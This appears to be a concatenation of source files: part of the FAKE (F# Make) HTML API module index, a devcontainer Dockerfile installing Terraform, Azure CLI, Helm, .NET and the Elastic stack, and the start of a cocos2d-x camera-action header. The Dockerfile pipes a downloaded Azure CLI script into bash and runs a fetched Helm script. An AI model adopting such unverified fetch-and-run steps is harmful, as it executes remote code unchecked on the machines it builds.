<td class="module-name">
<a href="fake-mstest.html">MSTest</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://en.wikipedia.org/wiki/Visual_Studio_Unit_Testing_Framework/">MSTest</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-mspechelper.html">MSpecHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to run <a href="https://github.com/machine/machine.specifications">machine.specifications</a> tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-magehelper.html">MageHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow FAKE to call the <a href="http://msdn.microsoft.com/en-us/library/acz3y3te.aspx">Manifest Generation and Editing Tool</a>, in short 'MAGE'.
The intended use is the creation of a ClickOnce application.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-messagehelper.html">MessageHelper</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow FAKE to interact with other applications via message files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuildlogger.html">MsBuildLogger</a>
</td>
<td class="xmldoc"><p>Contains Logger implementations for MsBuild.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ncoverhelper.html">NCoverHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://www.ncover.com/">NCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ndepend.html">NDepend</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to run <a href="http://www.ndepend.com/">NDepend</a> on .NET project files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ngenhelper.html">NGenHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for the ngen.exe</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitcommon.html">NUnitCommon</a>
</td>
<td class="xmldoc"><p>Contains types and utility functions relaited to running <a href="http://www.nunit.org/">NUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitparallel.html">NUnitParallel</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://www.nunit.org/">NUnit</a> unit tests in parallel.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitsequential.html">NUnitSequential</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://www.nunit.org/">NUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nunitxml.html">NUnitXml</a>
</td>
<td class="xmldoc"><p>Contains types and functions for working with <a href="http://www.nunit.org/">NUnit</a> unit tests result xml.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-npmhelper.html">NpmHelper</a>
</td>
<td class="xmldoc"><p>Contains function to run npm tasks</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nugethelper.html">NuGetHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions and task which allow to inspect, create and publish <a href="https://www.nuget.org/">NuGet</a> packages.
There is also a tutorial about <a href="../create-nuget-package.html">nuget package creating</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-octotools.html">OctoTools</a>
</td>
<td class="xmldoc"><p>Contains tasks which can be used for automated deployment via <a href="http://octopusdeploy.com/">Octopus Deploy</a>.
There is also a tutorial about the <a href="../octopusdeploy.html">Octopus deployment helper</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-opencoverhelper.html">OpenCoverHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="https://github.com/sawilde/opencover">OpenCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-paket.html">Paket</a>
</td>
<td class="xmldoc"><p>Contains helper functions and task which allow to inspect, create and publish <a href="https://www.nuget.org/">NuGet</a> packages with <a href="http://fsprojects.github.io/Paket/index.html">Paket</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-permissionshelper.html">PermissionsHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to deal with permissions.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-processhelper.html">ProcessHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which can be used to start other tools.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-processtestrunner.html">ProcessTestRunner</a>
</td>
<td class="xmldoc"><p>Allows to execute processes as unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-rest.html">REST</a>
</td>
<td class="xmldoc"><p>Contains functions to execute typical HTTP/REST calls.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-raygunhelper.html">RaygunHelper</a>
</td>
<td class="xmldoc"><p>Enables deployment tracking using Raygun.io</p>
<p>Thin wrapper around <a href="https://raygun.io/docs/deployments/api">the Raygun HTTP deployment API</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-regasmhelper.html">RegAsmHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run regasm .NET assembly</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-registryhelper.html">RegistryHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to read and write information from/to the registry.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-releasenoteshelper.html">ReleaseNotesHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to parse Release Notes text files. Either "simple" or "complex" format is accepted.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-reportgeneratorhelper.html">ReportGeneratorHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="https://reportgenerator.codeplex.com">ReportGenerator</a>,
which converts XML reports generated by PartCover, OpenCover or NCover into a readable report in various formats.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-restorepackagehelper.html">RestorePackageHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to restore NuGet packages from a NuGet package feed like <a href="http://www.nuget.org">nuget.org</a>.
There is also a tutorial about <a href="../nuget.html">nuget package restore</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-robocopyhelper.html">RoboCopyHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to use <a href="https://en.wikipedia.org/wiki/Robocopy">robocopy</a> on Windows.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-roundhousehelper.html">RoundhouseHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://projectroundhouse.org/">RoundhousE</a> database migrations.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-scphelper.html">SCPHelper</a>
</td>
<td class="xmldoc"><p>Conatins a task which allows to perform file copies using <a href="http://en.wikipedia.org/wiki/Secure_copy">SCP</a>, which is based on the Secure Shell (SSH) protocol.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-semverhelper.html">SemVerHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to deal with <a href="http://semver.org/">Semantic Versioning</a> (SemVer).</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-servicecontrollerhelpers.html">ServiceControllerHelpers</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to control NT services.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-signhelper.html">SignHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to sign assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-specflowhelper.html">SpecFlowHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to run <a href="http://www.specflow.org/">SpecFlow</a> tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-squirrel.html">Squirrel</a>
</td>
<td class="xmldoc"><p>Contains types and utility functions related to creating <a href="https://github.com/Squirrel/Squirrel.Windows">Squirrel</a> installer.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-stringhelper.html">StringHelper</a>
</td>
<td class="xmldoc"><p>Contains basic functions for string manipulation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-strongnaminghelper.html">StrongNamingHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for Microsoft's sn.exe</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-sxshelper.html">SxsHelper</a>
</td>
<td class="xmldoc"><p>Module that enables creating and embedding Side-by-Side interop
manifests for registration free deployment of Com-.net interop projects</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-targethelper.html">TargetHelper</a>
</td>
<td class="xmldoc"><p>Contains infrastructure code and helper functions for FAKE's target feature.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-taskrunnerhelper.html">TaskRunnerHelper</a>
</td>
<td class="xmldoc"><p>Contains a helper which can be used to implement timeouts and retries.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-teamcityhelper.html">TeamCityHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow FAKE to communicate with a TeamCity agent</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-teamcityresthelper.html">TeamCityRESTHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow FAKE to interact with the <a href="http://confluence.jetbrains.com/display/TCD8/REST+API">TeamCity REST API</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-templatehelper.html">TemplateHelper</a>
</td>
<td class="xmldoc"><p>Contains basic templating functions. Used in other helpers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-testflighthelper.html">TestFlightHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to upload apps to <a href="http://testflightapp.com">TestFlight</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-tracehelper.html">TraceHelper</a>
</td>
<td class="xmldoc"><p>This module contains function which allow to trace build output</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-tracelistener.html">TraceListener</a>
</td>
<td class="xmldoc"><p>Defines default listeners for build output traces</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-typescript.html">TypeScript</a>
</td>
<td class="xmldoc"><p>Contains code to call the typescript compiler. There is also a <a href="../typescript.html">tutorial</a> for this task available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-unittestcommon.html">UnitTestCommon</a>
</td>
<td class="xmldoc"><p>This module contains types and functions that are common for unit test helpers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-unittesthelper.html">UnitTestHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to report unit test results to build servers.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-userinputhelper.html">UserInputHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to interactively input values</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vsshelper.html">VSSHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions for <a href="http://en.wikipedia.org/wiki/Microsoft_Visual_SourceSafe">Microsoft Visual SourceSafe</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vstest.html">VSTest</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://msdn.microsoft.com/en-us/library/ms182486.aspx">VSTest</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-vb6helper.html">Vb6Helper</a>
</td>
<td class="xmldoc"><p>Enables building of Visual Basic 6 projects
Also includes a do-it-all function that will embed interop
side-by-side manifest to executables from Vb6 using
functions from the Side-by-side helper module</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-versionhelper.html">VersionHelper</a>
</td>
<td class="xmldoc"></td>
</tr>
<tr>
<td class="module-name">
<a href="fake-wixhelper.html">WiXHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to create msi installers using the <a href="http://wixtoolset.org/">WiX toolset</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xcopyhelper.html">XCopyHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to use <a href="http://en.wikipedia.org/wiki/XCOPY">XCOPY</a> on Windows.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xdthelper.html">XDTHelper</a>
</td>
<td class="xmldoc"><p>Contains functions used to transform config (or any XML) files using Microsoft's XML Document Transformations.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xmlhelper.html">XMLHelper</a>
</td>
<td class="xmldoc"><p>Contains functions to read and write XML files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xunit2helper.html">XUnit2Helper</a>
</td>
<td class="xmldoc"><p>DEPRECATED. See <a href="fake-testing-xunit2.html"><code>Fake.Testing.XUnit2</code></a>.</p>
<p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xunithelper.html">XUnitHelper</a>
</td>
<td class="xmldoc"><p>DEPRECATED. See <a href="fake-testing-xunit.html"><code>Fake.Testing.XUnit</code></a>.</p>
<p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xamarinhelper.html">XamarinHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks for building Xamarin.iOS and Xamarin.Android apps</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-xpkghelper.html">XpkgHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to create packages in <a href="http://components.xamarin.com/">Xamarin's xpkg format</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ziphelper.html">ZipHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function to create and extract zip archives.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Azure Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-azure-cloudservices.html">CloudServices</a>
</td>
<td class="xmldoc"><p>Contains tasks to package Azure Cloud Services.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-azure-webjobs.html">WebJobs</a>
</td>
<td class="xmldoc"><p>Contains tasks to package and deploy <a href="http://azure.microsoft.com/en-gb/documentation/articles/web-sites-create-web-jobs/">Azure Web Jobs</a> via the <a href="https://github.com/projectkudu/kudu">Kudu</a> Zip controller</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.CMakeSupport Namespace</h2>
<div>
<table class="table table-bordered type-list">
<thead>
<tr><td>Type</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakebuildparams.html">CMakeBuildParams</a>
</td>
<td class="xmldoc"><p>The CMakeBuild parameter type.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakegenerateparams.html">CMakeGenerateParams</a>
</td>
<td class="xmldoc"><p>The CMakeGenerate parameter type.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakevalue.html">CMakeValue</a>
</td>
<td class="xmldoc"><p>The possible variable value types for CMake variables.</p>
</td>
</tr>
<tr>
<td class="type-name">
<a href="fake-cmakesupport-cmakevariable.html">CMakeVariable</a>
</td>
<td class="xmldoc"><p>A CMake variable.</p>
</td>
</tr>
</tbody>
</table>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-cmakesupport-cmake.html">CMake</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to use CMake to build CMakeLists files.
See <code>Samples/CMakeSupport</code> for usage examples.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Git Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-git-branches.html">Branches</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git branches.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commandhelper.html">CommandHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to interact with <a href="http://git-scm.com/">git</a> via the command line.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commit.html">Commit</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to commit to git repositories.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-commitmessage.html">CommitMessage</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to get and set the git commit message.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-filestatus.html">FileStatus</a>
</td>
<td class="xmldoc"><p>Contains helper functions which can be used to retrieve file status information from git.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-information.html">Information</a>
</td>
<td class="xmldoc"><p>Contains helper functions which can be used to retrieve status information from git.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-merge.html">Merge</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git merge.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-rebase.html">Rebase</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git rebase.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-repository.html">Repository</a>
</td>
<td class="xmldoc"><p>Contains functions which allow basic operations on git repositories.
All operations assume that the CommandHelper can find git.exe.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-reset.html">Reset</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git reset.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-sha1.html">SHA1</a>
</td>
<td class="xmldoc"><p>Contains functions which allow the SHA1 of a file with git and without it.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-sanitychecks.html">SanityChecks</a>
</td>
<td class="xmldoc"><p>Contains helper function which can be used for sanity checks.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-staging.html">Staging</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git's staging area.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-stash.html">Stash</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git stash.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-git-submodule.html">Submodule</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to deal with git submodules.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.MSBuild Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-msbuild-projectsystem.html">ProjectSystem</a>
</td>
<td class="xmldoc"><p>Contains project file comparion tools for MSBuild project files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuild-specsremovement.html">SpecsRemovement</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to remove side-by-side specs during the build.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.NuGet Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-nuget-install.html">Install</a>
</td>
<td class="xmldoc"><p>Contains tasks for installing NuGet packages using the <a href="http://docs.nuget.org/docs/reference/command-line-reference#Install_Command">nuget.exe install command</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-nuget-update.html">Update</a>
</td>
<td class="xmldoc"><p>Contains tasks for updating NuGet packages including assembly hint paths in the project files using the <a href="http://docs.nuget.org/docs/reference/command-line-reference#Update_Command">nuget.exe update command</a>.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Fake.Testing Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-testing-xunit.html">XUnit</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> v1 unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-testing-xunit2.html">XUnit2</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="https://github.com/xunit/xunit">xUnit</a> v2 unit tests.</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2>Test.FAKECore Namespace</h2>
<div>
<table class="table table-bordered type-list">
<thead>
<tr><td>Type</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="type-name">
<a href="test-fakecore-fsharpfuncutil.html">FSharpFuncUtil</a>
</td>
<td class="xmldoc"></td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="span3">
<a href="http://fsharp.github.io/FAKE/index.html">
<img src="http://fsharp.github.io/FAKE/pics/logo.png" style="width:140px;height:140px;margin:10px 0px 0px 35px;border-style:none;" />
</a>
<ul class="nav nav-list" id="menu">
<li class="nav-header">FAKE - F# Make</li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/index.html">Home page</a></li>
<li class="divider"></li>
<li><a href="https://www.nuget.org/packages/FAKE">Get FAKE - F# Make via NuGet</a></li>
<li><a href="http://github.com/fsharp/fake">Source Code on GitHub</a></li>
<li><a href="http://github.com/fsharp/fake/blob/master/License.txt">License (Apache 2)</a></li>
<li><a href="http://fsharp.github.io/FAKE/RELEASE_NOTES.html">Release Notes</a></li>
<li><a href="http://fsharp.github.io/FAKE//contributing.html">Contributing to FAKE - F# Make</a></li>
<li><a href="http://fsharp.github.io/FAKE/users.html">Who is using FAKE?</a></li>
<li><a href="http://stackoverflow.com/questions/tagged/f%23-fake">Ask a question</a></li>
<li class="nav-header">Tutorials</li>
<li><a href="http://fsharp.github.io/FAKE/gettingstarted.html">Getting started</a></li>
<li><a href="http://fsharp.github.io/FAKE/cache.html">Build script caching</a></li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/nuget.html">NuGet package restore</a></li>
<li><a href="http://fsharp.github.io/FAKE/fxcop.html">Using FxCop in a build</a></li>
<li><a href="http://fsharp.github.io/FAKE/assemblyinfo.html">Generating AssemblyInfo</a></li>
<li><a href="http://fsharp.github.io/FAKE/create-nuget-package.html">Create NuGet packages</a></li>
<li><a href="http://fsharp.github.io/FAKE/specifictargets.html">Running specific targets</a></li>
<li><a href="http://fsharp.github.io/FAKE/commandline.html">Running FAKE from command line</a></li>
<li><a href="http://fsharp.github.io/FAKE/parallel-build.html">Running targets in parallel</a></li>
<li><a href="http://fsharp.github.io/FAKE/fsc.html">Using the F# compiler from FAKE</a></li>
<li><a href="http://fsharp.github.io/FAKE/customtasks.html">Creating custom tasks</a></li>
<li><a href="http://fsharp.github.io/FAKE/soft-dependencies.html">Soft dependencies</a></li>
<li><a href="http://fsharp.github.io/FAKE/teamcity.html">TeamCity integration</a></li>
<li><a href="http://fsharp.github.io/FAKE/canopy.html">Running canopy tests</a></li>
<li><a href="http://fsharp.github.io/FAKE/octopusdeploy.html">Octopus Deploy</a></li>
<li><a href="http://fsharp.github.io/FAKE/typescript.html">TypeScript support</a></li>
<li><a href="http://fsharp.github.io/FAKE/azurewebjobs.html">Azure WebJobs support</a></li>
<li><a href="http://fsharp.github.io/FAKE/azurecloudservices.html">Azure Cloud Services support</a></li>
<li><a href="http://fsharp.github.io/FAKE/fluentmigrator.html">FluentMigrator support</a></li>
<li><a href="http://fsharp.github.io/FAKE/androidpublisher.html">Android publisher</a></li>
<li><a href="http://fsharp.github.io/FAKE/watch.html">File Watcher</a></li>
<li class="divider"></li>
<li><a href="http://fsharp.github.io/FAKE/deploy.html">Fake.Deploy</a></li>
<li><a href="http://fsharp.github.io/FAKE/iis.html">Fake.IIS</a></li>
<li class="nav-header">Reference</li>
<li><a href="http://fsharp.github.io/FAKE/apidocs/index.html">API Reference</a></li>
</ul>
</div>
</div>
</div>
<a href="http://github.com/fsharp/fake"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_gray_6d6d6d.png" alt="Fork me on GitHub"></a>
</body>
</html>
| raphaelmesquita/KataTennis |
<|start_filename|>.devcontainer/Dockerfile<|end_filename|>
FROM mcr.microsoft.com/vscode/devcontainers/base:0-ubuntu20.04
ARG BUILD_ELASTIC_STACK_VERSION="6.8.20"
ARG BUILD_TERRAFORM_VERSION="1.0.9"
# Update & Install Open JDK
RUN apt-get update && apt-get upgrade -y && apt-get install -y default-jre
# Install Terraform
ENV TERRAFORM_VERSION=${BUILD_TERRAFORM_VERSION}
RUN curl -Os https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \
unzip -o terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin
RUN rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip
# Install Azure CLI
RUN curl -sL https://aka.ms/InstallAzureCLIDeb | bash
# Install Helm
RUN curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
RUN chmod 700 get_helm.sh
RUN ./get_helm.sh
# Install .NET SDK
RUN wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
RUN dpkg -i packages-microsoft-prod.deb
RUN rm packages-microsoft-prod.deb
RUN apt-get update && \
apt-get install -y dotnet-sdk-3.1 dotnet-sdk-5.0
# Set current working directory to /home/vscode
USER vscode
ENV HOME=/home/vscode
WORKDIR $HOME
# Install ElasticSearch
ENV ELASTIC_STACK_VERSION=${BUILD_ELASTIC_STACK_VERSION}
RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
RUN shasum -a 512 -c elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
RUN tar -xzf elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN rm elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz
RUN rm elasticsearch-oss-${ELASTIC_STACK_VERSION}.tar.gz.sha512
# Install Kibana
RUN wget https://artifacts.elastic.co/downloads/kibana/kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN wget https://artifacts.elastic.co/downloads/kibana/kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
RUN shasum -a 512 -c kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
RUN tar -xzf kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN rm kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz
RUN rm kibana-oss-${ELASTIC_STACK_VERSION}-linux-x86_64.tar.gz.sha512
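# Illustrative build/run commands (assumptions, not part of the original file); the image
# tag is hypothetical and the --build-arg values repeat the ARG defaults declared above:
#   docker build -t k2bridge-devcontainer \
#     --build-arg BUILD_ELASTIC_STACK_VERSION=6.8.20 \
#     --build-arg BUILD_TERRAFORM_VERSION=1.0.9 .
#   docker run --rm -it k2bridge-devcontainer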
CMD [ "sleep", "infinity" ] | dupuyjs/K2Bridge |
<|start_filename|>cocos2dx/actions/CCActionCamera.h<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2008-2010 <NAME>
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCCAMERA_ACTION_H__
#define __CCCAMERA_ACTION_H__
#include "CCActionInterval.h"
NS_CC_BEGIN
class CCCamera;
/**
* @addtogroup actions
* @{
*/
/**
@brief Base class for CCCamera actions
@ingroup Actions
*/
class CC_DLL CCActionCamera : public CCActionInterval //<NSCopying>
{
public:
CCActionCamera()
:m_fCenterXOrig(0)
,m_fCenterYOrig(0)
,m_fCenterZOrig(0)
,m_fEyeXOrig(0)
,m_fEyeYOrig(0)
,m_fEyeZOrig(0)
,m_fUpXOrig(0)
,m_fUpYOrig(0)
,m_fUpZOrig(0)
{}
virtual ~CCActionCamera(){}
// super methods
virtual void startWithTarget(CCNode *pTarget);
virtual CCActionInterval * reverse();
protected:
float m_fCenterXOrig;
float m_fCenterYOrig;
float m_fCenterZOrig;
float m_fEyeXOrig;
float m_fEyeYOrig;
float m_fEyeZOrig;
float m_fUpXOrig;
float m_fUpYOrig;
float m_fUpZOrig;
};
/**
@brief CCOrbitCamera action
Orbits the camera around the center of the screen using spherical coordinates
@ingroup Actions
*/
class CC_DLL CCOrbitCamera : public CCActionCamera //<NSCopying>
{
public:
CCOrbitCamera()
: m_fRadius(0.0)
, m_fDeltaRadius(0.0)
, m_fAngleZ(0.0)
, m_fDeltaAngleZ(0.0)
